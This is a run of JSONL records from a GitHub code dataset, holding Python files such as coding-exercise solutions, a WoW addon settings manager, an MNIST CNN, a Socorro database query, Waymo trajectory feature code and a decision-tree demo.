int(input(msg))\n except (TypeError, ValueError):\n print('\\033[0;31mERRO! Por favor digite um número inteiro VALIDO!\\033[m')\n continue\n else:\n return n\n\n\ndef leiafloat(msg):\n while True:\n try:\n n = float(input(msg))\n except (TypeError, ValueError):\n print('\\033[0;31mERRO! 
Por favor digite um número real VALIDO!\\033[m')\n continue\n else:\n return n\n\n\nNUM_INT = leiaint('Digite um número inteiro: ')\nNUM_REAL = leiafloat('Digite um número real: ')\nprint(f'O número inteiro foi {NUM_INT} e o número real foi {NUM_REAL}.')","repo_name":"Matheus-Barbiot/Exercicios_Python_CEV","sub_path":"Exercícios_CEV/Desafio_113.py","file_name":"Desafio_113.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"12730406030","text":"def longest_common_substr(str1, str2):\r\n if not str1 or not str2:\r\n return 0\r\n if len(str1) <= 0 or len(str2) <= 0:\r\n return 0\r\n '''\r\n str1 = 'app'\r\n str2 = 'ppt'\r\n \r\n table[i][j] 记录 str1[0, i-1] (前 i 个) 和 str2[0, j-1] (前 j 个)的最长公共子串\r\n \r\n table[i][j] = table[i-1][j-1] + 1 if str1[i-1] == str2[j-1]\r\n 0 otherwise\r\n ~ a p p\r\n ~ 0 0 0 0\r\n p 0 0 1 1\r\n p 0 0 1 2\r\n t 0 1 1 0\r\n '''\r\n m = len(str1)\r\n n = len(str2)\r\n table = [[0 for j in range(n + 1)] for i in range(m + 1)]\r\n lcs = 0\r\n for i in range(1, m + 1):\r\n for j in range(1, n + 1):\r\n table[i][j] = table[i - 1][j - 1] + 1 if str1[i - 1] == str2[j - 1] else 0\r\n lcs = max(lcs, table[i][j])\r\n return lcs\r\n\r\n\r\nif __name__ == '__main__':\r\n str1 = 'app'\r\n str2 = 'ppt'\r\n res = longest_common_substr(str1, str2)\r\n print(res)","repo_name":"hu-guanwei/coding","sub_path":"lcs_i.py","file_name":"lcs_i.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"24098539546","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 24 22:24:17 2020\r\n\r\n@author: liuga\r\n\"\"\"\r\nimport random\r\n\r\nclass Solution(object):\r\n def randomIndex(self, nums, k):\r\n \r\n e = nums.count(k)\r\n i = random.randint(1, e)\r\n for j in range(len(nums)):\r\n if nums[j] == k:\r\n i = i-1\r\n if i == 0:\r\n return j\r\n\r\n\r\ndef __init__(self, nums):\r\n self.nums = nums\r\n \r\ndef pick(self, target):\r\n res = None\r\n count = 0\r\n for i, x in enumerate(self.nums):\r\n if x == target:\r\n count += 1\r\n chance = random.randint(1, count)\r\n if chance == count:\r\n res = i\r\n return res\r\n","repo_name":"Misskesite/Leetcode","sub_path":"398randomIndex.py","file_name":"398randomIndex.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"25970228185","text":"# Author: btjanaka (Bryon Tjanaka)\n# Problem: (LeetCode) 149\n# Title: Max Points on a Line\n# Link: https://leetcode.com/problems/max-points-on-a-line\n# Idea: This solution looks at every point and checks how many other points\n# align with it along a given line.\n# Difficulty: hard\n# Tags: geometry\nfrom math import gcd\nfrom fractions import Fraction\nfrom collections import defaultdict\n\n\nclass Solution:\n\n def maxPoints(self, points: List[List[int]]) -> int:\n if len(points) == 1: return 1\n mx = 0\n for x1, y1 in points:\n line_counts = defaultdict(int)\n for x2, y2 in points:\n if x1 == x2 and y1 == y2: continue\n if x1 == x2:\n line_counts[1, 0, 0, 0] += 1\n continue # vertical line\n m = Fraction(y2 - y1, x2 - x1)\n m /= gcd(m.numerator, m.denominator)\n b = y2 - m * x2\n line_counts[(m.numerator, m.denominator, b.numerator,\n b.denominator)] += 1\n count = 0 if len(line_counts) == 0 else max(line_counts.values())\n mx = max(count + points.count([x1, y1]), mx)\n return 
mx\n","repo_name":"btjanaka/algorithm-problems","sub_path":"leetcode/149.py","file_name":"149.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"18002687674","text":"import simplejson\nimport os\nimport logging\nfrom sortedcontainers import sorteddict\nimport datetime\n\nconfig_path = './config/'\nconfig_file_name = 'config.json'\naddons_file_name = 'addons.json'\n\n\nclass Settings(object):\n\n def __init__(self):\n self.config = sorteddict.SortedDict()\n self.addons = sorteddict.SortedDict()\n self.initialize_data()\n self.files_to_update = []\n self.load_config()\n self.load_addons()\n self.check_retro()\n\n def initialize_data(self):\n if not os.path.isdir('./config'):\n os.mkdir('./config')\n logging.critical(\"Creating config directory.\")\n else:\n logging.info(\"Config directory exists.\")\n\n if not os.path.exists(config_path + config_file_name):\n self.config['settings'] = {'wow_dir': '', 'prompt_to_close': True, \"remove_old_archive\": True}\n\n logging.info(\"Creating config.json file.\")\n self.save_config()\n\n if not os.path.exists(config_path + addons_file_name):\n self.addons['addons'] = {}\n logging.info(\"Creating addons.json file.\")\n\n self.save_addons()\n\n def check_for_wow_directory(self, parent):\n\n if self.config['settings']['wow_dir'] == '':\n parent.MessageBox.emit(\"Addons directory not found.\",\n \"Please specify the directory where you want the addons to be downloaded to in \"\n \"the Settings window.\" \n \"\\n\\nThis is usually: 'World of Warcraft/Interface/AddOns'\\n\", 'inform')\n\n return False\n\n return True\n\n def check_retro(self):\n if 'settings' not in self.config:\n self.config['settings'] = {}\n\n if 'wow_dir' not in self.config['settings']:\n self.config['settings']['wow_dir'] = \"\"\n self.save_config()\n\n if 'prompt_to_close' not in self.config['settings']:\n self.config['settings']['prompt_to_close'] = True\n self.save_config()\n\n if 'remove_old_archive' not in self.config['settings']:\n self.config['settings']['remove_old_archive'] = True\n self.save_config()\n\n if 'addons' not in self.addons:\n self.addons['addons'] = \"\"\n self.save_addons()\n\n # Check if addon information is in the config.json file.\n if 'addons' in self.config:\n print(\"Addons in config.\")\n\n self.addons['addons'] = self.config['addons']\n self.config.pop('addons', None)\n self.save_config()\n self.save_addons()\n\n now = datetime.datetime.now()\n for addon in self.addons['addons']:\n if 'last_update_date' not in self.addons['addons'][addon]:\n self.addons['addons'][addon]['last_update_date'] = \"{0}/{1}/{2}\".format(now.month, now.day, now.year)\n self.save_addons()\n\n if 'last_update_data' in self.addons['addons'][addon]:\n self.addons['addons'][addon]['last_update_date'] = self.addons['addons'][addon]['last_update_data']\n del self.addons['addons'][addon]['last_update_data']\n\n def write_addon_info(self, key, info):\n self.addons['addons'][key] = info\n\n def load_config(self):\n with open(config_path + config_file_name, 'r') as f:\n self.config = simplejson.loads(f.read())\n\n def load_addons(self):\n with open(config_path + addons_file_name, 'r') as f:\n self.addons = simplejson.loads(f.read())\n\n def save_config(self):\n with open(config_path + config_file_name, 'w') as f:\n f.write(simplejson.dumps(self.config, indent=4, ensure_ascii=True))\n\n def save_addons(self):\n self.addons['addons'] = {k: self.addons['addons'][k] for k in 
sorted(self.addons['addons'])}\n\n        with open(config_path + addons_file_name, 'w') as f:\n            f.write(simplejson.dumps(self.addons, indent=4, ensure_ascii=True))\n\n    def get_settings_keys(self):\n        for key in self.addons['addons']:\n            print(key)\n\n\nif __name__ == '__main__':\n    s = Settings()\n    # s.get_settings_keys()\n    # s.write_addon_info('test', {'url': 'd', 'ver': '4'})\n    # s.write_addon_info('test1', {'url': 'd', 'ver': '4'})\n    # s.save_config()\n    s.load_config()\n\n    s.get_settings_keys()\n","repo_name":"PaulCanada/wow-addon-updater","sub_path":"src/dev/classes/application/Settings.py","file_name":"Settings.py","file_ext":"py","file_size_in_byte":4370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"676881799","text":"from utils import *\nfrom skimg_local import rgb2hsv, hsv2rgb\n\n\ndef select_channels(img_RGB):\n    \"\"\"\n    Returns the R' and V* channels for a skin lesion image.\n\n    Args:\n        img_RGB (np.array): The RGB image of the skin lesion\n    \"\"\"\n    img_RGB_norm = img_RGB / 255.0\n    img_r_norm = img_RGB_norm[..., 0] / (\n        img_RGB_norm[..., 0] + img_RGB_norm[..., 1] + img_RGB_norm[..., 2]\n    )\n    img_v = np.max(img_RGB, axis=2)\n\n    return (img_r_norm, img_v)\n\n\ndef calculate_GRAY(img_RGB):\n    \"\"\"\n    Returns the single channel grayscale representation of\n    the skin lesion.\n\n    Args:\n        img_RGB (np.array): The RGB image of the skin lesion\n    \"\"\"\n    img_torch = torch.from_numpy(img_RGB) + eps\n\n    X = torch.log(torch.reshape(img_torch, (-1, 3)))\n    X_mean = torch.mean(X, 0)\n    X -= X_mean.expand_as(X)\n\n    U, S, V = torch.svd(torch.t(X))\n    C = torch.mm(X, U[..., :1])\n    C_reshaped = torch.reshape(C, (128, 128, -1))[..., 0]\n\n    C_reshaped_np = C_reshaped.cpu().detach().numpy()\n\n    return C_reshaped_np\n\n\ndef calculate_Intrinsic_SA(img_RGB):\n    \"\"\"\n    Returns the illumination invariant 'intrinsic' image and \n    the shading attenuated representation for the skin lesion.\n\n    Args:\n        img_RGB (np.array): The RGB image of the skin lesion\n    \"\"\"\n    img_torch = torch.from_numpy(img_RGB) + eps\n    angle, projected = entropy_intrinsic(img_torch, calculate_intrinsic_img=True)\n    projected_np = projected.cpu().detach().numpy()\n\n    img_RGB_norm = img_RGB / 255.0\n    projected_norm = projected_np / 255.0\n    img_HSV = rgb2hsv(img_RGB)\n    matched = hist_match(img_HSV[..., 2], projected_norm)\n    img_HSV[..., 2] = matched\n    img_RGB_SA_norm = hsv2rgb(img_HSV)\n    img_RGB_SA = img_RGB_SA_norm * 255\n\n    return (projected_np, img_RGB_SA)\n","repo_name":"kakumarabhishek/Illumination-based-Transformations-Skin-Lesion-Segmentation","sub_path":"transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"92"} +{"seq_id":"74947194540","text":"import pandas\n\ndf = pandas.read_csv('appcategory_associations.csv')\n\nprint('\\nPreview:')\nprint(df)\n\nprint('\\nNumber of rows: ' + str(df.shape[0]))\n\nweights = []\n\ncount = 0\nactualID = df['appid'][0]\n\n\nfor i in range(df.shape[0]):\n\n    if df['appid'][i] == actualID:\n        count += 1\n\n    else:\n        weights.extend((1/count) for i in range(count))\n\n        count = 1\n        actualID = df['appid'][i]\n\n\n    # Make sure we don't skip the weight addition for the last game. 
\n    if i == df.shape[0] - 1: \n        weights.extend((1/count) for i in range(count))\n\n\ndfWithWeights = df.assign(weights=weights)\n\nprint('\\nDataframe preview with weights:')\nprint(dfWithWeights)\n\ndfWithWeights.to_csv('appcategory_associations_with_weights.csv', index=False)\n\n# The new dataframe with weights is saved to a csv file above.\n","repo_name":"DavidG33k/SteamDataWarehouse","sub_path":"DataSet Steam/scripts/MultipleArcsWeightGenerator.py","file_name":"MultipleArcsWeightGenerator.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"36192397732","text":"import tensorflow as tf\r\nimport numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as mpimg\r\n\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\nmnist = input_data.read_data_sets('data/MNIST/', one_hot=True)\r\n\r\n\r\n#input_data\r\nimg_size = 28\r\nn_classes = 10\r\nbatch_size = 100\r\nn_epochs = 3\r\n\r\n#conv_1\r\nfilter_size_1 = 5\r\nnum_filter_1 = 16\r\n\r\n#max_pool_1\r\nfilter_size_m1 = 2\r\n\r\n#conv_2\r\nfilter_size_2 = 5\r\nnum_filter_2 = 36\r\n\r\n#max_pool_2\r\nfilter_size_m2 = 2\r\n\r\n#full_conn\r\nfc_num_features = 128\r\nn_feature = 7*7*36\r\n\r\n#Weights and Biases\r\nweights={'weight_conv1':tf.Variable(tf.random_normal([filter_size_1,filter_size_1,1,num_filter_1])),\r\n        'weight_conv2':tf.Variable(tf.random_normal([filter_size_2,filter_size_2,num_filter_1,num_filter_2])),\r\n        'weight_fully_conn1':tf.Variable(tf.random_normal([n_feature, fc_num_features])),\r\n        'weight_fully_conn2':tf.Variable(tf.random_normal([fc_num_features, n_classes]))\r\n        }\r\n\r\nbiases={'biases_conv1':tf.Variable(tf.constant(0.05, shape=[num_filter_1])),\r\n        'biases_conv2':tf.Variable(tf.constant(0.05, shape=[num_filter_2])),\r\n        'biases_fully_conn1':tf.Variable(tf.constant(0.05, shape=[fc_num_features])),\r\n        'biases_fully_conn2':tf.Variable(tf.constant(0.05, shape=[n_classes]))\r\n        }\r\n    \r\nx = tf.placeholder(tf.float32, shape=[None, img_size*img_size], name = 'x')\r\n\r\ny = tf.placeholder(tf.float32, shape=[None, n_classes], name = 'y')\r\n\r\nsaver = tf.train.Saver()\r\n\r\n#Layers of the neural network\r\ndef conv_layer(image, weights, biases):\r\n    return tf.nn.conv2d(input=image,\r\n                 filter=weights,\r\n                 strides=[1,1,1,1],\r\n                 padding='SAME')+biases\r\ndef max_pool(image):\r\n    return tf.nn.max_pool(value=image,\r\n                          ksize=[1,2,2,1],\r\n                          strides=[1,2,2,1],\r\n                          padding='SAME')\r\ndef relu(image):\r\n    return tf.nn.relu(image)\r\ndef fully_connected_layer(image, weights, biases):\r\n    return tf.matmul(image,weights)+biases\r\n\r\n#neural_network_model\r\ndef neural_network_model(x, testing):\r\n\r\n    x = tf.reshape(x, [-1, img_size, img_size, 1])\r\n    conv1 = conv_layer(x, weights['weight_conv1'], biases['biases_conv1'])\r\n    max1 = max_pool(conv1)\r\n    relu1 = relu(max1)\r\n    conv2 = conv_layer(relu1, weights['weight_conv2'], biases['biases_conv2'])\r\n    max2 = max_pool(conv2)\r\n    relu2 = relu(max2)\r\n\r\n    #reshape for the fully connected layer\r\n    fc = tf.reshape(relu2, [-1, n_feature])\r\n    \r\n    fcl = fully_connected_layer(fc, weights['weight_fully_conn1'], biases['biases_fully_conn1'])\r\n    relu3 = relu(fcl)\r\n    fcl2 = fully_connected_layer(relu3, weights['weight_fully_conn2'], biases['biases_fully_conn2']) \r\n\r\n    #return raw logits for training; softmax_cross_entropy_with_logits applies the softmax itself\r\n    if testing:\r\n        output = tf.nn.softmax(fcl2)\r\n        return tf.argmax(output, axis=1)\r\n\r\n    return fcl2\r\n\r\ndef train_neural_network(x, y):\r\n\r\n    model = 
neural_network_model(x, False)\r\n\r\n    cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits = model,\r\n                                                            labels = y)\r\n\r\n    cost = tf.reduce_mean(cross_entropy)\r\n\r\n    optimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(cost)\r\n\r\n    prediction = tf.equal(tf.argmax(model, 1), tf.argmax(y, 1))\r\n\r\n    accuracy = tf.reduce_mean(tf.cast(prediction, tf.float32))\r\n    \r\n    with tf.Session() as ses:\r\n        ses.run(tf.global_variables_initializer())\r\n        #print('old weights: ',ses.run(weights['weight_conv1']))\r\n\r\n        for epoch in range(n_epochs):\r\n            epoch_loss = 0\r\n            for i in range(int(mnist.train.num_examples/batch_size)):\r\n\r\n                x_set, y_set = mnist.train.next_batch(batch_size)\r\n                _, c = ses.run([optimizer, cost], feed_dict={x: x_set,\r\n                                                             y: y_set})\r\n\r\n                epoch_loss += c\r\n            print('Epoch: ', epoch, ' Loss: ', epoch_loss)\r\n            print(ses.run(weights['weight_conv1']))\r\n            save_path = saver.save(ses, 'F:/python/trained_data/mnist_data/data.ckpt')\r\n        #For testing the changes\r\n        acc = accuracy.eval({x:mnist.test.images,\r\n                             y:mnist.test.labels})\r\n        #print('new weights: ',ses.run(weights['weight_conv1']))\r\n\r\n        print('Accuracy: ', acc)\r\n    \r\ntrain_neural_network(x, y)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"SangameshMOtageri/Number_recognition_interface","sub_path":"model_used_to_train_ocr1.py","file_name":"model_used_to_train_ocr1.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"22518864034","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport logging\n\nfrom socorro.external.postgresql.base import PostgreSQLBase\n\nimport socorro.lib.external_common as external_common\n\nlogger = logging.getLogger(\"webapi\")\n\n\nclass Util(PostgreSQLBase):\n\n    \"\"\"\n    Implement /util services with PostgreSQL.\n    \"\"\"\n\n    def versions_info(self, **kwargs):\n        \"\"\"\n        Return information about versions of a product.\n\n        See https://socorro.readthedocs.io/en/latest/middleware.html\n\n        Keyword arguments:\n        versions - List of products and versions.\n\n        Return:\n        None if versions is null or empty ;\n        Otherwise a dictionary of data about a version, i.e.:\n        {\n            \"product_name:version_string\": {\n                \"product_version_id\": integer,\n                \"version_string\": \"string\",\n                \"product_name\": \"string\",\n                \"major_version\": \"string\" or None,\n                \"release_channel\": \"string\" or None,\n                \"build_id\": [list, of, decimals] or None\n            }\n        }\n\n        \"\"\"\n        # Parse arguments\n        filters = [\n            (\"versions\", None, [\"list\", \"str\"])\n        ]\n        params = external_common.parse_arguments(filters, kwargs)\n\n        if \"versions\" not in params or not params[\"versions\"]:\n            return None\n\n        products_list = []\n        (versions_list, products_list) = self.parse_versions(\n            params[\"versions\"],\n            products_list\n        )\n\n        if not versions_list:\n            return None\n\n        versions = []\n        products = []\n        for x in xrange(0, len(versions_list), 2):\n            products.append(versions_list[x])\n            versions.append(versions_list[x + 1])\n\n        params = {}\n        params = self.dispatch_params(params, \"product\", products)\n        params = self.dispatch_params(params, \"version\", versions)\n        prefixed_versions = [\"^%s\" % x for x in versions]\n        params = self.dispatch_params(\n            params,\n            \"start_with_version\",\n            prefixed_versions\n        )\n\n        where_product = []\n 
where_rapid_beta = []\n        for i in range(len(products)):\n            where_product.append(\"\"\"\n                (pv.product_name = %%(product%(i)s)s\n                AND pv.version_string ~ %%(start_with_version%(i)s)s)\n            \"\"\" % {'i': i})\n            where_rapid_beta.append(\"\"\"\n                (\n                    i1.version_string = %%(version%(i)s)s\n                    AND i1.version_string = i2.version_string\n                ) OR (\n                    i1.rapid_beta_id = i2.product_version_id\n                    AND i2.version_string = %%(version%(i)s)s\n                    AND i2.is_rapid_beta IS TRUE\n                )\n            \"\"\" % {'i': i})\n\n        sql = \"\"\"\n        /* socorro.external.postgresql.util.Util.versions_info */\n        WITH infos AS (\n            SELECT\n                pv.product_version_id,\n                pv.version_string,\n                pv.product_name,\n                pv.release_version,\n                pv.build_type,\n                pvb.build_id,\n                pv.is_rapid_beta,\n                pv.rapid_beta_id,\n                pv.version_sort\n            FROM product_versions pv\n            LEFT JOIN product_version_builds pvb ON\n                (pv.product_version_id = pvb.product_version_id)\n            WHERE %(product_filters)s\n        )\n        SELECT DISTINCT\n            i1.product_version_id,\n            i1.product_name,\n            i1.version_string,\n            i1.release_version,\n            i1.build_type,\n            i1.build_id,\n            i1.is_rapid_beta,\n            i2.is_rapid_beta AS is_from_rapid_beta,\n            (i2.product_name || ':' || i2.version_string)\n                AS from_beta_version,\n            i1.version_sort\n        FROM infos i1\n        LEFT JOIN infos i2 ON (\n            i1.product_name = i2.product_name\n            AND i1.release_version = i2.release_version\n            AND i1.build_type = i2.build_type\n        )\n        WHERE %(rapid_beta_filters)s\n        ORDER BY i1.version_sort\n        \"\"\" % {\n            \"product_filters\": \" OR \".join(where_product),\n            \"rapid_beta_filters\": \" OR \".join(where_rapid_beta),\n        }\n\n        error_message = \"Failed to retrieve versions data from PostgreSQL\"\n        results = self.query(sql, params, error_message=error_message)\n\n        res = {}\n        for row in results:\n            version = dict(zip((\n                \"product_version_id\",\n                \"product_name\",\n                \"version_string\",\n                \"major_version\",\n                \"release_channel\",\n                \"build_id\",\n                \"is_rapid_beta\",\n                \"is_from_rapid_beta\",\n                \"from_beta_version\",\n                \"version_sort\",\n            ), row))\n\n            key = \":\".join((\n                version[\"product_name\"],\n                version[\"version_string\"]\n            ))\n\n            del version[\"version_sort\"] # no need to send this back\n\n            if key in res:\n                # That key already exists, just add the new buildid to it\n                res[key][\"build_id\"].append(int(version[\"build_id\"]))\n            else:\n                if version[\"build_id\"]:\n                    version[\"build_id\"] = [int(version[\"build_id\"])]\n\n                res[key] = version\n\n        return res\n","repo_name":"lienduo/OSS","sub_path":"CrashDump/socorro-master/socorro/external/postgresql/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":5728,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"} +{"seq_id":"36031374250","text":"import json\nimport os\nimport lxml.etree\nimport tempfile\nimport shutil\nimport subprocess\nimport unittest\nimport warnings\n\nfrom zope.interface.interfaces import IInterface\nfrom silva.fanstatic.extending import INTERFACES_RESOURCES\n\n\n@apply\ndef HAVE_BUSTER():\n    try:\n        process = subprocess.Popen(\n            ['buster', '--version'],\n            stdout=subprocess.PIPE,\n            stderr=subprocess.PIPE)\n        stdout, stderr = process.communicate()\n    except OSError as error:\n        if error.args[0] == 2:\n            return False\n        # Re-raise unexpected OSErrors so stdout is never read unbound.\n        raise\n    return stdout.startswith('Buster.JS')\n\n\nclass BusterTestCase(unittest.TestCase):\n    \"\"\"A buster test case to run Javascript tests.\n    \"\"\"\n\n    def __init__(self, filename, sources=None, name=None):\n        unittest.TestCase.__init__(self)\n        self._filename = filename\n        self._sources = None\n        self._name = name\n        self._path = None\n        if sources is not None:\n            self.sources = 
sources\n\n    @apply\n    def sources():\n\n        def setter(self, sources):\n            if sources is None:\n                self._sources = None\n                return\n            assert IInterface.providedBy(sources), 'Invalid source specifier.'\n            self._sources = sources\n            if not self._name:\n                self._name = sources.__identifier__.split('.')[-1]\n\n        def getter(self):\n            if self._sources is not None:\n                group = INTERFACES_RESOURCES.get(self._sources.__identifier__)\n                if group is not None:\n                    for resource in sorted(group.resources):\n                        stack = [resource.library.path]\n                        if resource.dirname:\n                            stack.append(resource.dirname)\n                        stack.append(resource.filename)\n                        yield os.path.join(*stack)\n\n        return property(getter, setter)\n\n    def _writeConfiguration(self, directory):\n        with open(os.path.join(directory, 'buster.js'), 'w') as handle:\n            handle.write(\"\"\"\n// Generated configuration\nvar config = module.exports;\n\"\"\")\n            handle.write(\"\"\"\nconfig[\"{name}\"] = {{\n    rootPath: \"/\",\n    environment: \"browser\",\n    sources: {sources},\n    tests: [\"{filename}\"]\n}};\n\"\"\".format(name=self._name,\n           sources=json.dumps(list(self.sources)),\n           filename=self._filename))\n\n    def setUp(self):\n        self._path = tempfile.mkdtemp()\n        self._writeConfiguration(self._path)\n\n    def runTest(self):\n        if not HAVE_BUSTER:\n            warnings.warn(\n                u\"Buster is not installed.\",\n                UserWarning)\n            raise unittest.SkipTest()\n        process = subprocess.Popen(\n            ['buster', 'test', '-r', 'xml'],\n            stdout=subprocess.PIPE,\n            stderr=subprocess.PIPE,\n            cwd=self._path)\n        stdout, stderr = process.communicate()\n        if stderr:\n            raise self.failureException(stderr)\n        if not stdout:\n            warnings.warn(\n                u\"Buster server is not running.\",\n                UserWarning)\n            raise unittest.SkipTest()\n        root = lxml.etree.fromstring(stdout)\n        for testsuite in root.getchildren():\n            assert testsuite.tag == 'testsuite'\n            for testcase in testsuite.getchildren():\n                assert testcase.tag == 'testcase'\n                failures = testcase.xpath('//failure')\n                if len(failures):\n                    raise self.failureException(\n                        \"Test %s (%s) failed:\\n%s\" % (\n                            testcase.attrib['name'],\n                            testcase.attrib['classname'],\n                            '\\n'.join(\n                                map(lambda f: \"{type}: {message}\".format(\n                                    type=f.attrib['type'],\n                                    message=f.attrib['message']),\n                                    failures))))\n\n    def tearDown(self):\n        try:\n            shutil.rmtree(self._path)\n            self._path = None\n        except:\n            pass\n\n    def id(self):\n        return self._name\n\n    def __eq__(self, other):\n        if not isinstance(other, self.__class__):\n            raise TypeError\n        return other._filename == self._filename\n\n    def __ne__(self, other):\n        if not isinstance(other, self.__class__):\n            raise TypeError\n        return other._filename != self._filename\n\n    def __hash__(self):\n        return hash(self._filename)\n\n    def __str__(self):\n        return self._filename\n\n    def shortDescription(self):\n        return 'Buster tests: ' + self._filename\n\n\ntry:\n    import infrae.testing.testcase\nexcept ImportError:\n    pass\nelse:\n    infrae.testing.testcase.TEST_FACTORIES['.js'] = BusterTestCase\n","repo_name":"silvacms/silva.ui","sub_path":"src/silva/ui/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"14162346660","text":"from typing import Tuple, Union\nimport numpy as np\nimport tensorflow as tf\n\n\ndef one_step_diff(\n    t: tf.Tensor, prepend_value: Union[float, bool]) -> tf.Tensor:\n  \"\"\"Computes the 1-step discrete difference along the last axis.\n\n  This function is used to compute 1st and 2nd order derivatives of time-series.\n\n  Args:\n    t: A float Tensor of shape 
[..., steps].\n prepend_value: To maintain the original tensor shape, this value is\n prepended once to the 1-step difference.\n\n Returns:\n A Tensor of shape [..., steps] containing the 1-step differences, prepended\n with `prepend_value`.\n \"\"\"\n # Prepare the tensor containing the value(s) to prepend.\n prepend_shape = (*t.shape[:-1], 1)\n prepend_tensor = tf.fill(prepend_shape, prepend_value)\n return tf.concat([prepend_tensor, tf.experimental.numpy.diff(t)], axis=-1)\n\n\ndef compute_displacement_error(\n x: tf.Tensor, y: tf.Tensor, z: tf.Tensor,\n ref_x: tf.Tensor, ref_y: tf.Tensor, ref_z: tf.Tensor) -> tf.Tensor:\n \"\"\"Computes displacement error (in x,y,z) w.r.t. a reference trajectory.\n\n Note: This operation doesn't put any constraint on the shape of the tensors,\n except that they are all consistent with each other, so this can be used\n with any arbitrary tensor shape.\n\n Args:\n x: The x-component of the predicted trajectories.\n y: The y-component of the predicted trajectories.\n z: The z-component of the predicted trajectories.\n ref_x: The x-component of the reference trajectories.\n ref_y: The y-component of the reference trajectories.\n ref_z: The z-component of the reference trajectories.\n\n Returns:\n A float tensor with the same shape as all the arguments, containing\n the 3D distance between the predicted trajectories and the reference\n trajectories.\n \"\"\"\n return tf.linalg.norm(\n tf.stack([x, y, z], axis=-1) - tf.stack([ref_x, ref_y, ref_z], axis=-1),\n ord='euclidean', axis=-1)\n\n\ndef compute_kinematic_features(\n x: tf.Tensor,\n y: tf.Tensor,\n z: tf.Tensor,\n heading: tf.Tensor,\n seconds_per_step: float\n) -> Tuple[tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor]:\n \"\"\"Computes kinematic features (speeds and accelerations).\n\n Note: Everything is assumed to be valid, filtering must be done afterwards.\n To maintain the original tensor length, speeds are prepended with 1 np.nan,\n while accelerations with 2 np.nan.\n\n Args:\n x: A float tensor of shape (..., num_steps) containing x coordinates.\n y: A float tensor of shape (..., num_steps) containing y coordinates.\n z: A float tensor of shape (..., num_steps) containing z coordinates.\n heading: A float tensor of shape (..., num_steps,) containing heading.\n seconds_per_step: The duration (in seconds) of one step. This is used to\n scale speed and acceleration properly. This is always a positive value,\n usually defaulting to `submission_specs.STEP_DURATION_SECONDS`.\n\n Returns:\n A tuple containing the following 4 tensors:\n linear_speed: Magnitude of speed in (x, y, z). Shape (..., num_steps).\n linear_acceleration: Linear signed acceleration (changes in linear speed).\n Shape (..., num_steps).\n angular_speed: Angular speed (changes in heading). 
Shape (..., num_steps).\n    angular_acceleration: Angular acceleration (changes in `angular_speed`).\n      Shape (..., num_steps).\n  \"\"\"\n  # First order derivatives.\n  dpos = one_step_diff(tf.stack([x, y, z], axis=0), prepend_value=np.nan)\n  linear_speed = tf.linalg.norm(\n      dpos, ord='euclidean', axis=0) / seconds_per_step\n  dh = _wrap_angle(\n      one_step_diff(heading, prepend_value=np.nan)) / seconds_per_step\n  # Second order derivatives.\n  linear_accel = one_step_diff(\n      linear_speed, prepend_value=np.nan) / seconds_per_step\n  d2h = _wrap_angle(one_step_diff(dh, prepend_value=np.nan)) / seconds_per_step\n  return linear_speed, linear_accel, dh, d2h\n\n\ndef _wrap_angle(angle: tf.Tensor) -> tf.Tensor:\n  \"\"\"Wraps angles in the range [-pi, pi].\"\"\"\n  return (angle + np.pi) % (2 * np.pi) - np.pi\n","repo_name":"waymo-research/waymo-open-dataset","sub_path":"src/waymo_open_dataset/wdl_limited/sim_agents_metrics/trajectory_features.py","file_name":"trajectory_features.py","file_ext":"py","file_size_in_byte":4020,"program_lang":"python","lang":"en","doc_type":"code","stars":2387,"dataset":"github-code","pt":"92"} +{"seq_id":"6577746570","text":"from sklearn.tree import DecisionTreeClassifier, plot_tree\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\ndataset = pd.read_csv('slr.csv')\r\nx = dataset.iloc[:,:-1].values\r\ny = dataset.iloc[:,1].values\r\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.1, random_state=6)\r\nclf = DecisionTreeClassifier()\r\nclf.fit(x_train, y_train)\r\nc = clf.predict(x_test)\r\n\r\nacc = accuracy_score(y_test, c)\r\nprint(\"Accuracy of Decision Tree:\",acc)\r\nplot_tree(clf, filled=True)\r\nplt.title(\"Decision Tree 